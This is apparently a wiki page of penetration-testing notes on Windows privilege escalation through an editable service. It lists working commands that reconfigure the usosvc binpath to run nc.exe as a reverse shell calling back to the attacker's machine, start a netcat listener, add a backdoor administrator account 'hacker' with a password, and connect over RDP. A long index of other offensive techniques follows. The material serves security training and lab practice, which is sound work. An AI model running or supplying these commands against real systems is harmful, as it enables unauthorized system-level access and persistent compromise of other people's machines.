You must be signed in to change notification settings - Fork 7
Editable Service
Editable Service
If you find a service that is editable (WinPEAS can help here to find such services) you can edit the binpath to point to nc.exe to get a reverse shell.
Steps also described here: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc
Note: in both my experiences using this, this does get shell, but it closes in a few seconds.
- Upload
to a writable directory. sc config usosvc binpath= "C:\Inetpub\wwwroot\nc.exe -nv <kali_IP> 9988 -e C:\Windows\System32\cmd.exe"
sc config usosvc obj= ".\LocalSystem" password= ""
- I didn't need this second time using it
sc config usosvc start= "demand"
nc -lvp 9988
(setup listener on kali) net start usosvc
- R00T!
Since shell closes soon, add new admin user:
net user hacker h@ck3r%93 /add
net localgroup administrators hacker /add
Now RDP/ssh with new creds (if services are available, or you can open them yourself):
rdesktop <target>
- R00T!
The shell closes due to a Windows timeout variable in the registry that defines how long to wait for a service to response. If you're in a position to edit that (i.e. ssh/rdp not enabled) this would stabilize the shell. If you don’t want to edit the registry, since you're admin for a bit with this shell, you could try enabling RDP or SSH.
1. Recon
- Ping Sweep: Windows Method
- Ping Sweep: Bash Method
- NetDiscover (ARP Scanning
- Nbtscan
- Ping Sweep: Python Method
- Ping Sweep: PowerShell Method
- Ping Sweep: Nmap method
- HTTP General Notes
- Cross-Site Scripting (XSS)
- SQL Injection (SQLi)
- Deserialization
- Directory Fuzzing
- IDOR Testing
- Intigriti Bug Bounty Tips
- Out of band exploitation
- Server-Side Template Injection (SSTI) Help
- Subdomain Enumeration
- XXE Cheatsheet
- C2 Frameworks
- BloodHound
- Powershell Empire Quick Start Cheatsheet
- Pivoting/Tunneling
- Impacket
- Rubeus
- Mimikatz
- Identifying Hash Types
Dumping Hashes
- Cracking Hashes Offline
- Cracking Hashes Online
- Metasploit Meterpreter Migrate Process
- VMWare Port Forwarding
- Veil Simple Usage
- SSH: Generate OpenSSL RSA Key Pair from the Command Line
- Skipfish
- sed & awk: set root password in etc/shadow
- Search for ssh key quickly
- Python Proxy to Burp
- Python Convert .py to .exe
- PuttySCP Commands
- Powershell tidbits
- Password List - Generate quick list
- OS Enumeration - Ping
- Kerberos: Get KDC name and DNS name
- Impacket Scripts Error
- Gcc Compile Windows Executable in Linux
- Find Command: Filter out permission denied errors
- Excel Injection
- Digitally Sign Files (PowerShell Example)
- CSRF Tokens as Cookie Note
- Clear bash
- Burp Intruder Match/Replace
- Apache headers Test
- Windows Trial VMs
- Subdomain Brute Force
- Spawning TTY Shell
- Reserve Shell Cheat Sheet
- Pass-the-Hash
- Common Meterpreter Commands
- gcc & wine
- File Transfers
- Enable RDP - Windows
- DNS Reverse Lookup Brute Force
- Adding Users